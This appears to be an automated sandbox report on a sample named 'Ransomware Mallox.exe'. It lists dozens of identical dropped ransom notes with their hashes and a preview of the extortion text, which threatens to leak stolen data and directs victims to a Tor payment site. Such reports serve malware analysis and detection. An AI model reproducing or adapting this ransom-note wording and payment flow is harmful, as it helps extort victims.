                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
